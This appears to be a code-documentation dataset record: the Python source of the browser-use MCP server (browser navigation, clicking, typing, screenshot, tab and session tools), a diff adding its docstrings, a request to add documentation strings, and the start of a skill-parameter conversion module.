'type': 'integer',
'description': 'The index of the input element (from browser_get_state)',
},
'text': {'type': 'string', 'description': 'The text to type'},
},
'required': ['index', 'text'],
},
),
types.Tool(
name='browser_get_state',
description='Get the current state of the page including all interactive elements',
inputSchema={
'type': 'object',
'properties': {
'include_screenshot': {
'type': 'boolean',
'description': 'Whether to include a screenshot of the current page',
'default': False,
}
},
},
),
types.Tool(
name='browser_extract_content',
description='Extract structured content from the current page based on a query',
inputSchema={
'type': 'object',
'properties': {
'query': {'type': 'string', 'description': 'What information to extract from the page'},
'extract_links': {
'type': 'boolean',
'description': 'Whether to include links in the extraction',
'default': False,
},
},
'required': ['query'],
},
),
types.Tool(
name='browser_get_html',
description='Get the raw HTML of the current page or a specific element by CSS selector',
inputSchema={
'type': 'object',
'properties': {
'selector': {
'type': 'string',
'description': 'Optional CSS selector to get HTML of a specific element. If omitted, returns full page HTML.',
},
},
},
),
types.Tool(
name='browser_screenshot',
description='Take a screenshot of the current page. Returns viewport metadata as text and the screenshot as an image.',
inputSchema={
'type': 'object',
'properties': {
'full_page': {
'type': 'boolean',
'description': 'Whether to capture the full scrollable page or just the visible viewport',
'default': False,
},
},
},
),
types.Tool(
name='browser_scroll',
description='Scroll the page',
inputSchema={
'type': 'object',
'properties': {
'direction': {
'type': 'string',
'enum': ['up', 'down'],
'description': 'Direction to scroll',
'default': 'down',
}
},
},
),
types.Tool(
name='browser_go_back',
description='Go back to the previous page',
inputSchema={'type': 'object', 'properties': {}},
),
# Tab management
types.Tool(
name='browser_list_tabs', description='List all open tabs', inputSchema={'type': 'object', 'properties': {}}
),
types.Tool(
name='browser_switch_tab',
description='Switch to a different tab',
inputSchema={
'type': 'object',
'properties': {'tab_id': {'type': 'string', 'description': '4 Character Tab ID of the tab to switch to'}},
'required': ['tab_id'],
},
),
types.Tool(
name='browser_close_tab',
description='Close a tab',
inputSchema={
'type': 'object',
'properties': {'tab_id': {'type': 'string', 'description': '4 Character Tab ID of the tab to close'}},
'required': ['tab_id'],
},
),
# types.Tool(
# name="browser_close",
# description="Close the browser session",
# inputSchema={
# "type": "object",
# "properties": {}
# }
# ),
types.Tool(
name='retry_with_browser_use_agent',
description='Retry a task using the browser-use agent. Only use this as a last resort if you fail to interact with a page multiple times.',
inputSchema={
'type': 'object',
'properties': {
'task': {
'type': 'string',
'description': 'The high-level goal and detailed step-by-step description of the task the AI browser agent needs to attempt, along with any relevant data needed to complete the task and info about previous attempts.',
},
'max_steps': {
'type': 'integer',
'description': 'Maximum number of steps an agent can take.',
'default': 100,
},
'model': {
'type': 'string',
'description': 'LLM model to use (e.g., gpt-4o, claude-3-opus-20240229). Defaults to the configured model.',
},
'allowed_domains': {
'type': 'array',
'items': {'type': 'string'},
'description': 'List of domains the agent is allowed to visit (security feature)',
'default': [],
},
'use_vision': {
'type': 'boolean',
'description': 'Whether to use vision capabilities (screenshots) for the agent',
'default': True,
},
},
'required': ['task'],
},
),
# Browser session management tools
types.Tool(
name='browser_list_sessions',
description='List all active browser sessions with their details and last activity time',
inputSchema={'type': 'object', 'properties': {}},
),
types.Tool(
name='browser_close_session',
description='Close a specific browser session by its ID',
inputSchema={
'type': 'object',
'properties': {
'session_id': {
'type': 'string',
'description': 'The browser session ID to close (get from browser_list_sessions)',
}
},
'required': ['session_id'],
},
),
types.Tool(
name='browser_close_all',
description='Close all active browser sessions and clean up resources',
inputSchema={'type': 'object', 'properties': {}},
),
]
@self.server.list_resources()
async def handle_list_resources() -> list[types.Resource]:
return []
@self.server.list_prompts()
async def handle_list_prompts() -> list[types.Prompt]:
return []
@self.server.call_tool()
async def handle_call_tool(name: str, arguments: dict[str, Any] | None) -> list[types.TextContent | types.ImageContent]:
start_time = time.time()
error_msg = None
try:
result = await self._execute_tool(name, arguments or {})
if isinstance(result, list):
return result
return [types.TextContent(type='text', text=result)]
except Exception as e:
error_msg = str(e)
logger.error(f'Tool execution failed: {e}', exc_info=True)
return [types.TextContent(type='text', text=f'Error: {str(e)}')]
finally:
# Capture telemetry for tool calls
duration = time.time() - start_time
self._telemetry.capture(
MCPServerTelemetryEvent(
version=get_browser_use_version(),
action='tool_call',
tool_name=name,
duration_seconds=duration,
error_message=error_msg,
)
)
async def _execute_tool(
self, tool_name: str, arguments: dict[str, Any]
) -> str | list[types.TextContent | types.ImageContent]:
# Agent-based tools
if tool_name == 'retry_with_browser_use_agent':
return await self._retry_with_browser_use_agent(
task=arguments['task'],
max_steps=arguments.get('max_steps', 100),
model=arguments.get('model'),
allowed_domains=arguments.get('allowed_domains', []),
use_vision=arguments.get('use_vision', True),
)
# Browser session management tools (don't require active session)
if tool_name == 'browser_list_sessions':
return await self._list_sessions()
elif tool_name == 'browser_close_session':
return await self._close_session(arguments['session_id'])
elif tool_name == 'browser_close_all':
return await self._close_all_sessions()
# Direct browser control tools (require active session)
elif tool_name.startswith('browser_'):
# Ensure browser session exists
if not self.browser_session:
await self._init_browser_session()
if tool_name == 'browser_navigate':
return await self._navigate(arguments['url'], arguments.get('new_tab', False))
elif tool_name == 'browser_click':
return await self._click(
index=arguments.get('index'),
coordinate_x=arguments.get('coordinate_x'),
coordinate_y=arguments.get('coordinate_y'),
new_tab=arguments.get('new_tab', False),
)
elif tool_name == 'browser_type':
return await self._type_text(arguments['index'], arguments['text'])
elif tool_name == 'browser_get_state':
state_json, screenshot_b64 = await self._get_browser_state(arguments.get('include_screenshot', False))
content: list[types.TextContent | types.ImageContent] = [types.TextContent(type='text', text=state_json)]
if screenshot_b64:
content.append(types.ImageContent(type='image', data=screenshot_b64, mimeType='image/png'))
return content
elif tool_name == 'browser_get_html':
return await self._get_html(arguments.get('selector'))
elif tool_name == 'browser_screenshot':
meta_json, screenshot_b64 = await self._screenshot(arguments.get('full_page', False))
content: list[types.TextContent | types.ImageContent] = [types.TextContent(type='text', text=meta_json)]
if screenshot_b64:
content.append(types.ImageContent(type='image', data=screenshot_b64, mimeType='image/png'))
return content
elif tool_name == 'browser_extract_content':
return await self._extract_content(arguments['query'], arguments.get('extract_links', False))
elif tool_name == 'browser_scroll':
return await self._scroll(arguments.get('direction', 'down'))
elif tool_name == 'browser_go_back':
return await self._go_back()
elif tool_name == 'browser_close':
return await self._close_browser()
elif tool_name == 'browser_list_tabs':
return await self._list_tabs()
elif tool_name == 'browser_switch_tab':
return await self._switch_tab(arguments['tab_id'])
elif tool_name == 'browser_close_tab':
return await self._close_tab(arguments['tab_id'])
return f'Unknown tool: {tool_name}'
async def _init_browser_session(self, allowed_domains: list[str] | None = None, **kwargs):
if self.browser_session:
return
# Ensure all logging goes to stderr before browser initialization
_ensure_all_loggers_use_stderr()
logger.debug('Initializing browser session...')
# Get profile config
profile_config = get_default_profile(self.config)
# Merge profile config with defaults and overrides
profile_data = {
'downloads_path': str(Path.home() / 'Downloads' / 'browser-use-mcp'),
'wait_between_actions': 0.5,
'keep_alive': True,
'user_data_dir': '~/.config/browseruse/profiles/default',
'device_scale_factor': 1.0,
'disable_security': False,
'headless': False,
**profile_config, # Config values override defaults
}
# Tool parameter overrides (highest priority)
if allowed_domains is not None:
profile_data['allowed_domains'] = allowed_domains
# Merge any additional kwargs that are valid BrowserProfile fields
for key, value in kwargs.items():
profile_data[key] = value
# Create browser profile
profile = BrowserProfile(**profile_data)
# Create browser session
self.browser_session = BrowserSession(browser_profile=profile)
await self.browser_session.start()
# Track the session for management
self._track_session(self.browser_session)
# Create tools for direct actions
self.tools = Tools()
# Initialize LLM from config
llm_config = get_default_llm(self.config)
base_url = llm_config.get('base_url', None)
kwargs = {}
if base_url:
kwargs['base_url'] = base_url
if api_key := llm_config.get('api_key'):
self.llm = ChatOpenAI(
model=llm_config.get('model', 'gpt-o4-mini'),
api_key=api_key,
temperature=llm_config.get('temperature', 0.7),
**kwargs,
)
# Initialize FileSystem for extraction actions
file_system_path = profile_config.get('file_system_path', '~/.browser-use-mcp')
self.file_system = FileSystem(base_dir=Path(file_system_path).expanduser())
logger.debug('Browser session initialized')
async def _retry_with_browser_use_agent(
self,
task: str,
max_steps: int = 100,
model: str | None = None,
allowed_domains: list[str] | None = None,
use_vision: bool = True,
) -> str:
logger.debug(f'Running agent task: {task}')
# Get LLM config
llm_config = get_default_llm(self.config)
# Get LLM provider
model_provider = llm_config.get('model_provider') or os.getenv('MODEL_PROVIDER')
# Get Bedrock-specific config
if model_provider and model_provider.lower() == 'bedrock':
llm_model = llm_config.get('model') or os.getenv('MODEL') or 'us.anthropic.claude-sonnet-4-20250514-v1:0'
aws_region = llm_config.get('region') or os.getenv('REGION')
if not aws_region:
aws_region = 'us-east-1'
aws_sso_auth = llm_config.get('aws_sso_auth', False)
llm = ChatAWSBedrock(
model=llm_model, # or any Bedrock model
aws_region=aws_region,
aws_sso_auth=aws_sso_auth,
)
else:
api_key = llm_config.get('api_key') or os.getenv('OPENAI_API_KEY')
if not api_key:
return 'Error: OPENAI_API_KEY not set in config or environment'
# Use explicit model from tool call, otherwise fall back to configured default
llm_model = model or llm_config.get('model', 'gpt-4o')
base_url = llm_config.get('base_url', None)
kwargs = {}
if base_url:
kwargs['base_url'] = base_url
llm = ChatOpenAI(
model=llm_model,
api_key=api_key,
temperature=llm_config.get('temperature', 0.7),
**kwargs,
)
# Get profile config and merge with tool parameters
profile_config = get_default_profile(self.config)
# Override allowed_domains if provided in tool call
if allowed_domains is not None:
profile_config['allowed_domains'] = allowed_domains
# Create browser profile using config
profile = BrowserProfile(**profile_config)
# Create and run agent
agent = Agent(
task=task,
llm=llm,
browser_profile=profile,
use_vision=use_vision,
)
try:
history = await agent.run(max_steps=max_steps)
# Format results
results = []
results.append(f'Task completed in {len(history.history)} steps')
results.append(f'Success: {history.is_successful()}')
# Get final result if available
final_result = history.final_result()
if final_result:
results.append(f'\nFinal result:\n{final_result}')
# Include any errors
errors = history.errors()
if errors:
results.append(f'\nErrors encountered:\n{json.dumps(errors, indent=2)}')
# Include URLs visited
urls = history.urls()
if urls:
# Filter out None values and convert to strings
valid_urls = [str(url) for url in urls if url is not None]
if valid_urls:
results.append(f'\nURLs visited: {", ".join(valid_urls)}')
return '\n'.join(results)
except Exception as e:
logger.error(f'Agent task failed: {e}', exc_info=True)
return f'Agent task failed: {str(e)}'
finally:
# Clean up
await agent.close()
async def _navigate(self, url: str, new_tab: bool = False) -> str:
if not self.browser_session:
return 'Error: No browser session active'
# Update session activity
self._update_session_activity(self.browser_session.id)
from browser_use.browser.events import NavigateToUrlEvent
if new_tab:
event = self.browser_session.event_bus.dispatch(NavigateToUrlEvent(url=url, new_tab=True))
await event
return f'Opened new tab with URL: {url}'
else:
event = self.browser_session.event_bus.dispatch(NavigateToUrlEvent(url=url))
await event
return f'Navigated to: {url}'
async def _click(
self,
index: int | None = None,
coordinate_x: int | None = None,
coordinate_y: int | None = None,
new_tab: bool = False,
) -> str:
if not self.browser_session:
return 'Error: No browser session active'
# Update session activity
self._update_session_activity(self.browser_session.id)
# Coordinate-based clicking
if coordinate_x is not None and coordinate_y is not None:
from browser_use.browser.events import ClickCoordinateEvent
event = self.browser_session.event_bus.dispatch(
ClickCoordinateEvent(coordinate_x=coordinate_x, coordinate_y=coordinate_y)
)
await event
return f'Clicked at coordinates ({coordinate_x}, {coordinate_y})'
# Index-based clicking
if index is None:
return 'Error: Provide either index or both coordinate_x and coordinate_y'
# Get the element
element = await self.browser_session.get_dom_element_by_index(index)
if not element:
return f'Element with index {index} not found'
if new_tab:
# For links, extract href and open in new tab
href = element.attributes.get('href')
if href:
# Convert relative href to absolute URL
state = await self.browser_session.get_browser_state_summary()
current_url = state.url
if href.startswith('/'):
# Relative URL - construct full URL
from urllib.parse import urlparse
parsed = urlparse(current_url)
full_url = f'{parsed.scheme}://{parsed.netloc}{href}'
else:
full_url = href
# Open link in new tab
from browser_use.browser.events import NavigateToUrlEvent
event = self.browser_session.event_bus.dispatch(NavigateToUrlEvent(url=full_url, new_tab=True))
await event
return f'Clicked element {index} and opened in new tab {full_url[:20]}...'
else:
# For non-link elements, just do a normal click
from browser_use.browser.events import ClickElementEvent
event = self.browser_session.event_bus.dispatch(ClickElementEvent(node=element))
await event
return f'Clicked element {index} (new tab not supported for non-link elements)'
else:
# Normal click
from browser_use.browser.events import ClickElementEvent
event = self.browser_session.event_bus.dispatch(ClickElementEvent(node=element))
await event
return f'Clicked element {index}'
async def _type_text(self, index: int, text: str) -> str:
if not self.browser_session:
return 'Error: No browser session active'
element = await self.browser_session.get_dom_element_by_index(index)
if not element:
return f'Element with index {index} not found'
from browser_use.browser.events import TypeTextEvent
# Conservative heuristic to detect potentially sensitive data
# Only flag very obvious patterns to minimize false positives
is_potentially_sensitive = len(text) >= 6 and (
# Email pattern: contains @ and a domain-like suffix
('@' in text and '.' in text.split('@')[-1] if '@' in text else False)
# Mixed alphanumeric with reasonable complexity (likely API keys/tokens)
or (
len(text) >= 16
and any(char.isdigit() for char in text)
and any(char.isalpha() for char in text)
and any(char in '.-_' for char in text)
)
)
# Use generic key names to avoid information leakage about detection patterns
sensitive_key_name = None
if is_potentially_sensitive:
if '@' in text and '.' in text.split('@')[-1]:
sensitive_key_name = 'email'
else:
sensitive_key_name = 'credential'
event = self.browser_session.event_bus.dispatch(
TypeTextEvent(node=element, text=text, is_sensitive=is_potentially_sensitive, sensitive_key_name=sensitive_key_name)
)
await event
if is_potentially_sensitive:
if sensitive_key_name:
return f'Typed <{sensitive_key_name}> into element {index}'
else:
return f'Typed <sensitive> into element {index}'
else:
return f"Typed '{text}' into element {index}"
async def _get_browser_state(self, include_screenshot: bool = False) -> tuple[str, str | None]:
if not self.browser_session:
return 'Error: No browser session active', None
state = await self.browser_session.get_browser_state_summary()
result: dict[str, Any] = {
'url': state.url,
'title': state.title,
'tabs': [{'url': tab.url, 'title': tab.title} for tab in state.tabs],
'interactive_elements': [],
}
# Add viewport info so the LLM knows the coordinate space
if state.page_info:
pi = state.page_info
result['viewport'] = {
'width': pi.viewport_width,
'height': pi.viewport_height,
}
result['page'] = {
'width': pi.page_width,
'height': pi.page_height,
}
result['scroll'] = {
'x': pi.scroll_x,
'y': pi.scroll_y,
}
# Add interactive elements with their indices
for index, element in state.dom_state.selector_map.items():
elem_info: dict[str, Any] = {
'index': index,
'tag': element.tag_name,
'text': element.get_all_children_text(max_depth=2)[:100],
}
if element.attributes.get('placeholder'):
elem_info['placeholder'] = element.attributes['placeholder']
if element.attributes.get('href'):
elem_info['href'] = element.attributes['href']
result['interactive_elements'].append(elem_info)
# Return screenshot separately as ImageContent instead of embedding base64 in JSON
screenshot_b64 = None
if include_screenshot and state.screenshot:
screenshot_b64 = state.screenshot
# Include viewport dimensions in JSON so LLM can map pixels to coordinates
if state.page_info:
result['screenshot_dimensions'] = {
'width': state.page_info.viewport_width,
'height': state.page_info.viewport_height,
}
return json.dumps(result, indent=2), screenshot_b64
async def _get_html(self, selector: str | None = None) -> str:
if not self.browser_session:
return 'Error: No browser session active'
self._update_session_activity(self.browser_session.id)
cdp_session = await self.browser_session.get_or_create_cdp_session(target_id=None, focus=False)
if not cdp_session:
return 'Error: No active CDP session'
if selector:
js = (
f'(function(){{ const el = document.querySelector({json.dumps(selector)}); return el ? el.outerHTML : null; }})()'
)
else:
js = 'document.documentElement.outerHTML'
result = await cdp_session.cdp_client.send.Runtime.evaluate(
params={'expression': js, 'returnByValue': True},
session_id=cdp_session.session_id,
)
html = result.get('result', {}).get('value')
if html is None:
return f'No element found for selector: {selector}' if selector else 'Error: Could not get page HTML'
return html
async def _screenshot(self, full_page: bool = False) -> tuple[str, str | None]:
if not self.browser_session:
return 'Error: No browser session active', None
import base64
self._update_session_activity(self.browser_session.id)
data = await self.browser_session.take_screenshot(full_page=full_page)
b64 = base64.b64encode(data).decode()
# Return screenshot separately as ImageContent instead of embedding base64 in JSON
state = await self.browser_session.get_browser_state_summary()
result: dict[str, Any] = {
'size_bytes': len(data),
}
if state.page_info:
result['viewport'] = {
'width': state.page_info.viewport_width,
'height': state.page_info.viewport_height,
}
return json.dumps(result), b64
async def _extract_content(self, query: str, extract_links: bool = False) -> str:
if not self.llm:
return 'Error: LLM not initialized (set OPENAI_API_KEY)'
if not self.file_system:
return 'Error: FileSystem not initialized'
if not self.browser_session:
return 'Error: No browser session active'
if not self.tools:
return 'Error: Tools not initialized'
state = await self.browser_session.get_browser_state_summary()
# Use the extract action
# Create a dynamic action model that matches the tools's expectations
from pydantic import create_model
# Create action model dynamically
ExtractAction = create_model(
'ExtractAction',
__base__=ActionModel,
extract=dict[str, Any],
)
# Use model_validate because Pyright does not understand the dynamic model
action = ExtractAction.model_validate(
{
'extract': {'query': query, 'extract_links': extract_links},
}
)
action_result = await self.tools.act(
action=action,
browser_session=self.browser_session,
page_extraction_llm=self.llm,
file_system=self.file_system,
)
return action_result.extracted_content or 'No content extracted'
async def _scroll(self, direction: str = 'down') -> str:
if not self.browser_session:
return 'Error: No browser session active'
from browser_use.browser.events import ScrollEvent
# Scroll by a standard amount (500 pixels)
event = self.browser_session.event_bus.dispatch(
ScrollEvent(
direction=direction, # type: ignore
amount=500,
)
)
await event
return f'Scrolled {direction}'
async def _go_back(self) -> str:
if not self.browser_session:
return 'Error: No browser session active'
from browser_use.browser.events import GoBackEvent
event = self.browser_session.event_bus.dispatch(GoBackEvent())
await event
return 'Navigated back'
async def _close_browser(self) -> str:
if self.browser_session:
from browser_use.browser.events import BrowserStopEvent
event = self.browser_session.event_bus.dispatch(BrowserStopEvent())
await event
self.browser_session = None
self.tools = None
return 'Browser closed'
return 'No browser session to close'
async def _list_tabs(self) -> str:
if not self.browser_session:
return 'Error: No browser session active'
tabs_info = await self.browser_session.get_tabs()
tabs = []
for i, tab in enumerate(tabs_info):
tabs.append({'tab_id': tab.target_id[-4:], 'url': tab.url, 'title': tab.title or ''})
return json.dumps(tabs, indent=2)
async def _switch_tab(self, tab_id: str) -> str:
if not self.browser_session:
return 'Error: No browser session active'
from browser_use.browser.events import SwitchTabEvent
target_id = await self.browser_session.get_target_id_from_tab_id(tab_id)
event = self.browser_session.event_bus.dispatch(SwitchTabEvent(target_id=target_id))
await event
state = await self.browser_session.get_browser_state_summary()
return f'Switched to tab {tab_id}: {state.url}'
async def _close_tab(self, tab_id: str) -> str:
if not self.browser_session:
return 'Error: No browser session active'
from browser_use.browser.events import CloseTabEvent
target_id = await self.browser_session.get_target_id_from_tab_id(tab_id)
event = self.browser_session.event_bus.dispatch(CloseTabEvent(target_id=target_id))
await event
current_url = await self.browser_session.get_current_page_url()
return f'Closed tab # {tab_id}, now on {current_url}'
def _track_session(self, session: BrowserSession) -> None:
self.active_sessions[session.id] = {
'session': session,
'created_at': time.time(),
'last_activity': time.time(),
'url': getattr(session, 'current_url', None),
}
def _update_session_activity(self, session_id: str) -> None:
if session_id in self.active_sessions:
self.active_sessions[session_id]['last_activity'] = time.time()
async def _list_sessions(self) -> str:
if not self.active_sessions:
return 'No active browser sessions'
sessions_info = []
for session_id, session_data in self.active_sessions.items():
session = session_data['session']
created_at = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(session_data['created_at']))
last_activity = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(session_data['last_activity']))
# Check if session is still active
is_active = hasattr(session, 'cdp_client') and session.cdp_client is not None
sessions_info.append(
{
'session_id': session_id,
'created_at': created_at,
'last_activity': last_activity,
'active': is_active,
'current_url': session_data.get('url', 'Unknown'),
'age_minutes': (time.time() - session_data['created_at']) / 60,
}
)
return json.dumps(sessions_info, indent=2)
async def _close_session(self, session_id: str) -> str:
if session_id not in self.active_sessions:
return f'Session {session_id} not found'
session_data = self.active_sessions[session_id]
session = session_data['session']
try:
# Close the session
if hasattr(session, 'kill'):
await session.kill()
elif hasattr(session, 'close'):
await session.close()
# Remove from tracking
del self.active_sessions[session_id]
# If this was the current session, clear it
if self.browser_session and self.browser_session.id == session_id:
self.browser_session = None
self.tools = None
return f'Successfully closed session {session_id}'
except Exception as e:
return f'Error closing session {session_id}: {str(e)}'
async def _close_all_sessions(self) -> str:
if not self.active_sessions:
return 'No active sessions to close'
closed_count = 0
errors = []
for session_id in list(self.active_sessions.keys()):
try:
result = await self._close_session(session_id)
if 'Successfully closed' in result:
closed_count += 1
else:
errors.append(f'{session_id}: {result}')
except Exception as e:
errors.append(f'{session_id}: {str(e)}')
# Clear current session references
self.browser_session = None
self.tools = None
result = f'Closed {closed_count} sessions'
if errors:
result += f'. Errors: {"; ".join(errors)}'
return result
async def _cleanup_expired_sessions(self) -> None:
current_time = time.time()
timeout_seconds = self.session_timeout_minutes * 60
expired_sessions = []
for session_id, session_data in self.active_sessions.items():
last_activity = session_data['last_activity']
if current_time - last_activity > timeout_seconds:
expired_sessions.append(session_id)
for session_id in expired_sessions:
try:
await self._close_session(session_id)
logger.info(f'Auto-closed expired session {session_id}')
except Exception as e:
logger.error(f'Error auto-closing session {session_id}: {e}')
async def _start_cleanup_task(self) -> None:
async def cleanup_loop():
while True:
try:
await self._cleanup_expired_sessions()
# Check every 2 minutes
await asyncio.sleep(120)
except Exception as e:
logger.error(f'Error in cleanup task: {e}')
await asyncio.sleep(120)
self._cleanup_task = create_task_with_error_handling(cleanup_loop(), name='mcp_cleanup_loop', suppress_exceptions=True)
async def run(self):
# Start the cleanup task
await self._start_cleanup_task()
async with mcp.server.stdio.stdio_server() as (read_stream, write_stream):
await self.server.run(
read_stream,
write_stream,
InitializationOptions(
server_name='browser-use',
server_version='0.1.0',
capabilities=self.server.get_capabilities(
notification_options=NotificationOptions(),
experimental_capabilities={},
),
),
)
async def main(session_timeout_minutes: int = 10):
if not MCP_AVAILABLE:
print('MCP SDK is required. Install with: pip install mcp', file=sys.stderr)
sys.exit(1)
server = BrowserUseServer(session_timeout_minutes=session_timeout_minutes)
server._telemetry.capture(
MCPServerTelemetryEvent(
version=get_browser_use_version(),
action='start',
parent_process_cmdline=get_parent_process_cmdline(),
)
)
try:
await server.run()
finally:
duration = time.time() - server._start_time
server._telemetry.capture(
MCPServerTelemetryEvent(
version=get_browser_use_version(),
action='stop',
duration_seconds=duration,
parent_process_cmdline=get_parent_process_cmdline(),
)
)
server._telemetry.flush()
if __name__ == '__main__':
asyncio.run(main()) | --- +++ @@ -1,3 +1,27 @@+"""MCP Server for browser-use - exposes browser automation capabilities via Model Context Protocol.
+
+This server provides tools for:
+- Running autonomous browser tasks with an AI agent
+- Direct browser control (navigation, clicking, typing, etc.)
+- Content extraction from web pages
+- File system operations
+
+Usage:
+ uvx browser-use --mcp
+
+Or as an MCP server in Claude Desktop or other MCP clients:
+ {
+ "mcpServers": {
+ "browser-use": {
+ "command": "uvx",
+ "args": ["browser-use[cli]", "--mcp"],
+ "env": {
+ "OPENAI_API_KEY": "sk-proj-1234567890",
+ }
+ }
+ }
+ }
+"""
import os
import sys
@@ -35,6 +59,7 @@
def _configure_mcp_server_logging():
+ """Configure logging for MCP server mode - redirect all logs to stderr to prevent JSON RPC interference."""
# Set environment to suppress browser-use logging during server mode
os.environ['BROWSER_USE_LOGGING_LEVEL'] = 'warning'
os.environ['BROWSER_USE_SETUP_LOGGING'] = 'false' # Prevent automatic logging setup
@@ -76,6 +101,7 @@
def _ensure_all_loggers_use_stderr():
+ """Ensure ALL loggers only output to stderr, not stdout."""
# Get the stderr handler
stderr_handler = None
for handler in logging.root.handlers:
@@ -128,6 +154,7 @@
def get_parent_process_cmdline() -> str | None:
+ """Get the command line of all parent processes up the chain."""
if not PSUTIL_AVAILABLE:
return None
@@ -158,6 +185,7 @@
class BrowserUseServer:
+ """MCP Server for browser-use capabilities."""
def __init__(self, session_timeout_minutes: int = 10):
# Ensure all logging goes to stderr (in case new loggers were created)
@@ -182,9 +210,11 @@ self._setup_handlers()
def _setup_handlers(self):
+ """Setup MCP server handlers."""
@self.server.list_tools()
async def handle_list_tools() -> list[types.Tool]:
+ """List all available browser-use tools."""
return [
# Agent tools
# Direct browser control tools
@@ -415,14 +445,17 @@
@self.server.list_resources()
async def handle_list_resources() -> list[types.Resource]:
+ """List available resources (none for browser-use)."""
return []
@self.server.list_prompts()
async def handle_list_prompts() -> list[types.Prompt]:
+ """List available prompts (none for browser-use)."""
return []
@self.server.call_tool()
async def handle_call_tool(name: str, arguments: dict[str, Any] | None) -> list[types.TextContent | types.ImageContent]:
+ """Handle tool execution."""
start_time = time.time()
error_msg = None
try:
@@ -450,6 +483,7 @@ async def _execute_tool(
self, tool_name: str, arguments: dict[str, Any]
) -> str | list[types.TextContent | types.ImageContent]:
+ """Execute a browser-use tool. Returns str for most tools, or a content list for tools with image output."""
# Agent-based tools
if tool_name == 'retry_with_browser_use_agent':
@@ -532,6 +566,7 @@ return f'Unknown tool: {tool_name}'
async def _init_browser_session(self, allowed_domains: list[str] | None = None, **kwargs):
+ """Initialize browser session using config"""
if self.browser_session:
return
@@ -604,6 +639,7 @@ allowed_domains: list[str] | None = None,
use_vision: bool = True,
) -> str:
+ """Run an autonomous agent task."""
logger.debug(f'Running agent task: {task}')
# Get LLM config
@@ -697,6 +733,7 @@ await agent.close()
async def _navigate(self, url: str, new_tab: bool = False) -> str:
+ """Navigate to a URL."""
if not self.browser_session:
return 'Error: No browser session active'
@@ -721,6 +758,7 @@ coordinate_y: int | None = None,
new_tab: bool = False,
) -> str:
+ """Click an element by index or at viewport coordinates."""
if not self.browser_session:
return 'Error: No browser session active'
@@ -784,6 +822,7 @@ return f'Clicked element {index}'
async def _type_text(self, index: int, text: str) -> str:
+ """Type text into an element."""
if not self.browser_session:
return 'Error: No browser session active'
@@ -829,6 +868,7 @@ return f"Typed '{text}' into element {index}"
async def _get_browser_state(self, include_screenshot: bool = False) -> tuple[str, str | None]:
+ """Get current browser state. Returns (state_json, screenshot_b64 | None)."""
if not self.browser_session:
return 'Error: No browser session active', None
@@ -884,6 +924,7 @@ return json.dumps(result, indent=2), screenshot_b64
async def _get_html(self, selector: str | None = None) -> str:
+ """Get raw HTML of the page or a specific element."""
if not self.browser_session:
return 'Error: No browser session active'
@@ -910,6 +951,7 @@ return html
async def _screenshot(self, full_page: bool = False) -> tuple[str, str | None]:
+ """Take a screenshot. Returns (metadata_json, screenshot_b64 | None)."""
if not self.browser_session:
return 'Error: No browser session active', None
@@ -933,6 +975,7 @@ return json.dumps(result), b64
async def _extract_content(self, query: str, extract_links: bool = False) -> str:
+ """Extract content from current page."""
if not self.llm:
return 'Error: LLM not initialized (set OPENAI_API_KEY)'
@@ -974,6 +1017,7 @@ return action_result.extracted_content or 'No content extracted'
async def _scroll(self, direction: str = 'down') -> str:
+ """Scroll the page."""
if not self.browser_session:
return 'Error: No browser session active'
@@ -990,6 +1034,7 @@ return f'Scrolled {direction}'
async def _go_back(self) -> str:
+ """Go back in browser history."""
if not self.browser_session:
return 'Error: No browser session active'
@@ -1000,6 +1045,7 @@ return 'Navigated back'
async def _close_browser(self) -> str:
+ """Close the browser session."""
if self.browser_session:
from browser_use.browser.events import BrowserStopEvent
@@ -1011,6 +1057,7 @@ return 'No browser session to close'
async def _list_tabs(self) -> str:
+ """List all open tabs."""
if not self.browser_session:
return 'Error: No browser session active'
@@ -1021,6 +1068,7 @@ return json.dumps(tabs, indent=2)
async def _switch_tab(self, tab_id: str) -> str:
+ """Switch to a different tab."""
if not self.browser_session:
return 'Error: No browser session active'
@@ -1033,6 +1081,7 @@ return f'Switched to tab {tab_id}: {state.url}'
async def _close_tab(self, tab_id: str) -> str:
+ """Close a specific tab."""
if not self.browser_session:
return 'Error: No browser session active'
@@ -1045,6 +1094,7 @@ return f'Closed tab # {tab_id}, now on {current_url}'
def _track_session(self, session: BrowserSession) -> None:
+ """Track a browser session for management."""
self.active_sessions[session.id] = {
'session': session,
'created_at': time.time(),
@@ -1053,10 +1103,12 @@ }
def _update_session_activity(self, session_id: str) -> None:
+ """Update the last activity time for a session."""
if session_id in self.active_sessions:
self.active_sessions[session_id]['last_activity'] = time.time()
async def _list_sessions(self) -> str:
+ """List all active browser sessions."""
if not self.active_sessions:
return 'No active browser sessions'
@@ -1083,6 +1135,7 @@ return json.dumps(sessions_info, indent=2)
async def _close_session(self, session_id: str) -> str:
+ """Close a specific browser session."""
if session_id not in self.active_sessions:
return f'Session {session_id} not found'
@@ -1109,6 +1162,7 @@ return f'Error closing session {session_id}: {str(e)}'
async def _close_all_sessions(self) -> str:
+ """Close all active browser sessions."""
if not self.active_sessions:
return 'No active sessions to close'
@@ -1136,6 +1190,7 @@ return result
async def _cleanup_expired_sessions(self) -> None:
+ """Background task to clean up expired sessions."""
current_time = time.time()
timeout_seconds = self.session_timeout_minutes * 60
@@ -1153,6 +1208,7 @@ logger.error(f'Error auto-closing session {session_id}: {e}')
async def _start_cleanup_task(self) -> None:
+ """Start the background cleanup task."""
async def cleanup_loop():
while True:
@@ -1167,6 +1223,7 @@ self._cleanup_task = create_task_with_error_handling(cleanup_loop(), name='mcp_cleanup_loop', suppress_exceptions=True)
async def run(self):
+ """Run the MCP server."""
# Start the cleanup task
await self._start_cleanup_task()
@@ -1215,4 +1272,4 @@
if __name__ == '__main__':
- asyncio.run(main())+ asyncio.run(main())
| https://raw.githubusercontent.com/browser-use/browser-use/HEAD/browser_use/mcp/server.py |
Expand my code with proper documentation strings |
from typing import Any
from pydantic import BaseModel, Field, create_model
from browser_use.skills.views import ParameterSchema
def convert_parameters_to_pydantic(parameters: list[ParameterSchema], model_name: str = 'SkillParameters') -> type[BaseModel]:
if not parameters:
# Return empty model if no parameters
return create_model(model_name, __base__=BaseModel)
fields: dict[str, Any] = {}
for param in parameters:
# Map parameter type string to Python types
python_type: Any = str # default
param_type = param.type
if param_type == 'string':
python_type = str
elif param_type == 'number':
python_type = float
elif param_type == 'boolean':
python_type = bool
elif param_type == 'object':
python_type = dict[str, Any]
elif param_type == 'array':
